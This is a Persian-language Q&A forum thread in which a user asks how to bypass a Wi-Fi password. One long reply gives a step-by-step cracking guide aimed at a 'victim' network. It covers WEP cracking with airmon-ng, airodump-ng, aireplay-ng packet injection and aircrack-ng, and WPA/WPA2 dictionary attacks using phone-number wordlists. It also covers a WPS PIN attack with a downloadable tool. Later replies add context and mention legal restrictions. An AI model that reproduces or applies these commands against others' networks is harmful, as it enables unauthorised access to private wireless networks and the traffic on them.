چطور میشه از Password یک شبکه بیسیم عبور کرد ؟
باسلام دوستان ، چطور میشه از Password یک شبکه wifiکه از طریق AP ارسال میشه عبور کرد؟ نوع اکسس پوینت ها تفاوت داره؟؟
7 پاسخ
به روزترین پاسخ رو ارسال می کنم خدمتتون ، پاسخ شما یک دوره کامل آموزش هک وایرلس هست که تو وب سایت قرار دادیم ، اما شما باید پیش زمینه های یادگیریش رو داشته باشید چون اینکار عملا تست نفوذ یا هک محسوب میشه و چیز ساده ای نیست به شکلی که فکر میشه :
سلام دوست عزیز. بله عملا به نوع Access Point، نوع Firmware و متد Password بستگی داره.
معمولا برای Crack کردن Password مربوط به Wireless از سیستم عامل تحت لینوکس به اسم BackTrack استفاده میشه.
با سلام فرمایش تمام دوستان صحیح و بسیار کامل است
بنده هم میخواهم به نوبه خود اطلاعات کم خودم رو برای دوستان که مطمئن هستم بلدن به اشتراک بذارم تقریبا یک سال هست که در حوضه امنیت شبکه وایرلس به صورت به اصطلاح دست و پا شکسته دارم فعالیت میکنم و میخواهم درباره هک انواع پسورد وایرلس به شما کمک کنم (امیدوارم به دردتون بخوره!)
برای اینکه هکرها نتوانند به راحتی پسورد شبکه های wifi رو به دست بیاورند متخصصین امنیت به اصطلاح رمزها را با استفاده از یک سری الگوریتم کد میکنند که در پایان لیست این الگوریتم ها رو به اضافه نحوه هک آنها را برای شما توضیح میدهم:
WEP
این نوع الگوریتم امروزه دیگر میشود گفت منسوخ شده و دیگر کاربرد نداره و امنیتش هم پایینه برای هک کردن این نوع الگوریتم بنده از سیستم عامل کالی لینوکس استفاده میکنم شما هم میتوانید از این سیستم عامل بسیار کاربردی استفاده کنید. برای هک ابتدا یک ترمینال باز کنید و دستورات زیر را به ترتیب بنویسید:
airmon-ng
این دستور لیست اینترفیس های متصل به دستگاه شما را نمایان میکند که اکثرا با عبارت wlan0 یا mon0 نمایان میشود فرض را بر این میگیرم که مال شما wlan0 است پس از دستور قبل این دستور رو مینویسیم:
airmon-ng start wlan0
این دستور اینترفیس شما را به حالت مانیتورینگ شبکه میبرد
airodump-ng wlan0
لیست ssid ها یا همون شبکه های وایرلس اطراف خونتون رو نشون میده
airodump-ng -w hacker -c 11 --bssid 00:11:22:33:44:55: wlan0
این دستور یک سری گزینه داره که باید اونا رو برات توضیح بدم اولی -w جلوی این گزینه نوشته شده hacker این اسم فایلی است که در آخر اونو برای کرک وای فای نیاز دازی میتونه اسمت دلخواه باشه
-c شماره کانال روتر وایرلسی که میخوای هکش کنی رو بنویسی (در هنگام اجرا کردن دستور سوم میتونی شماره کانال , mac address و نام شبکه رو ببینی) و --bssid هم باید ادرس مک روتر وایرلس قربانی رو بنویسی
بعد از اینا میتونی ببینی که data های ردوبدل شده در روتر وایرلس قربانی چقدر است برای هک تقریبا باید بالای 20000 پکت باشد اگر بود برو دستور بعدی اگر هم نبود این دستور رو تایپ کن:
aireplay-ng -1 0 -a BSSID -h 00:11:22:33:44:55 -e ssid wlan0
به جای BSSID مک روتر قربانی و یه جای ssid نام شبکه قربانی رو بنویس
اگر با دستور sociation successful رو داد یعنی در حال ذخیره پکت های قربانی هستی سپس دستور زیر رو بنویس:
aireplay-ng -3 -b BSSID -h 00:11:22:33:44:55 wlan0
به جای BSSID مک آدرس روتر وایرلس قربانی رو بنویس:
پس از اجرا آداپتور وایرلس شما شروع به ارسال و دریافت پکت های ARP میکند و میتوانید ببینید که در قسمت DATA شماره دیتا در حال افزایش است در اخر برای کرک دستور زیر رو بنویس:
aircrack-ng -b BSSID hacker-01.cap wlan0
به جای BSSID مک آدرس روتر و به جای hacker-01.cap نام فایل پیشنهای خودت که در اول انتخابش کرده بودی فقط یادت باشه که -01.cap حتما آخرش باشه در آخر پسورد وایرلس در جلوی عبارت key found نمایان میشود.
WPA,WPAPSK,WPA2,WPA2PSK,WPAWPA2PSK
این الگوریتم ها بسیار قوی هستند و به روشی که wep رو هک کردیم کرک نمیشوند مخصوصا الگوریتم WPAWPA2PSK که بسیار قوی است برای هک این نوع الگوریتم ها به دو روش دیکشنری و روشی به نام دوقلو های شرور در روش دیکشنری ما توسط یک لیست پسورد تمام پسورد های انتخاب خودمان را بر روی شبکه تست میکنیم تا بالاخره یکی از این پسورد ها درست از اب دربیایند (به نظر من و همین طور تجربه اندکم انتخاب لیست شماره موبایل شهر خودتان یا شماره شناسنامه بیشترین کارایی رو دارد) برای شروع شما همون کارهای که برای هک wep انجام دادیم رو برای این الگوریتم هم انجام بدید فقط در مرحله آخر به جای دستور آخری این دستور رو وارد کنید:
aircrack -ng -w password file -b bssid hacker-01.cap
روش دوم روش دوقلوی های شرور هست که روش پیشرفته ای برای هک این نوع الگوریتم است که شرمنده دوستم هستم اینجا جای آموزش این نوع روش نیست انشاالله بعدا
خب دوست من رسیدیم به یکی از مهمترین قسمت های این آموزش در این متد فرق نمیکنه الگوریتم روتر طرف چی باشه شما با استفاده از pin wps به مودم متصل میشوید که بسیار سریع است و اکثرا زیر 10 ثانیه هک میشوند شما کافیه نرم افزار Jump start رو دانلود کنید اینم لینکش:
http://www.uplooder.netcgi-bindl.cgi?key=25d526547dd0992ccced0b1a52773f14
سپس نرم افزار رو باز کنید به تب wps بروید و تیک گزینه todas las redes رو بزن سپس دکمه escanear رو انتخاب کن لیست روتر های وایرلسی که wps اونها فعال هستن رو به نمایش گذاشته میشه روی اونی که میخوای هکش کنی کلیک کن سپس در اخر بر روی inciar jump start کلیک کن زیر 15 ثانیه به دستگاه وصل میشی سپس برا دیدن پسورد میتونی بر روی آیکون کانشکن روتر وایرلس طرف کلیک راست کنی و گزینه status رو انتخاب کنی و بری به تب security و تیک show caricature رو بزن و میتونی پسوورد رو ببینی به همین راحتی
خب دوست من امیدوارم به دردت بخوره این روش ها و بتونی از اونها در راه درست استفاده کنی
یا علی
باتشکرازدوستان بخاطر توضیح خوبشون بالاخص اقای رضاسرفراز که بسیار عالی توضیح دادن. اقای سرفراز اگه یک ویدئو اپلود میکردین بسیار بهتر میشد چون برای ما تازه کارا یخورده گیج کننده هست. دوستانیکه فقط مایلن وای فای هک کنن میتونن از سیستم عامل wifislax استفاده کنن که مخصوص همین کار هست و یک سری نرم افزار داره که خودشون کار هک روانجام میدن و سیستم عامل کالی لینوکس مخصوص هکرهای حرفه ای هست که بااون همه چیز هک میکنن از سایت گرفته تا انواع سیستمها
دوست گرامی ممنون از راهنمای اما سیستم عامل لینوکس بدون هیچ password میتونه وصل بشه
در تکمیل صحبت های دوست خوبم مهندس نصیری، هیچ سیستم عاملی بدون وارد کردن Password نمیتونه به WIFI وصل بشه. به این خاطر که این Authentication Method توسط Access Point تعریف شده و ارتباطی به سیستم عامل موجود روی کلاینت نداره. همچنین این نکته رو هم اضافه کنم که ممکنه Password مربوط به WIFI به صورت مداوم تغییر کنه. یعنی فرد میتونه طوری تنظیم کنه که این Password مثلا هر ساعت Generate بشه و یک Password جدید داشته باشه.
هیچ سیستم عاملی نمی تونه همینجوری به رمزهای WiFi دسترسی پیدا کنه این فقط یک تصور عامه هست ، برای اینکه بتونید یک دستگاه وایرلس رو هک کنید در وهله اول باید بدونید از چه نوع پروتکل احراز هویتی استفاده می کنه ، اصلا اینجور نیست که بگید همه وایرلس ها به یک روش هک میشن
در ضمن اصلا کار ساده ای هم نیست که فکر کنید با چند تا کلیک اینکار انجام میشه ، شما حداقل دانش نسبت به الگوریتم های رمزنگاری وایرلس رو باید داشته باشید و حداقل دانش نسبت به استفاده از ابزارهای سیستم عامل لینوکس مثل Aircrack و Airmon و Aireplay و ... که براحتی در BackTrack می تونید این ابزارها رو پیدا کنید که طبیعی هست گرافیکی نیستن
اگر رمز وایرلس شما از الگوریتمی به نام WEP استفاده کنه می تونید خوشحال باشید که سخت ترین رمز عبور این وایرلس با استفاده از ابزارهایی که اسم بردیم در عرض 5 دقیقه کرک میشه چون این الگوریتم شکسته شده و دیگه معتبر نیست ، اما اگر از الگوریتم های پیشرفته تری مثل WPA و WPA2 و امثال اینها استفاده بشه دیگه بستگی به این داره که رمز شما چقدر سخت هست
چون این الگوریتم ها ذاتا باگ زیادی ندارن و شما از طریق Dictionary Attack می تونید به رمزهای اون دسترسی پیدا کنید ، بنده قبلا مقاله ای با عنوان هک وایرلس پروتکل WEP رو در اینترنت گذاشتم که کاملا توضیح داده بودم فرآیند از صفر تا صد به چه شکل هست اما وب سایت به دلیل همین مقاله که مرتبط با هک بود فیلتر شد بنابراین با توجه به قوانین جدید قانون جرائم رایانه ای این موضوع ها صرفا در حد تعریف در وب سایت ما می تونه مطرح بشه ، موفق و پیروز باشید.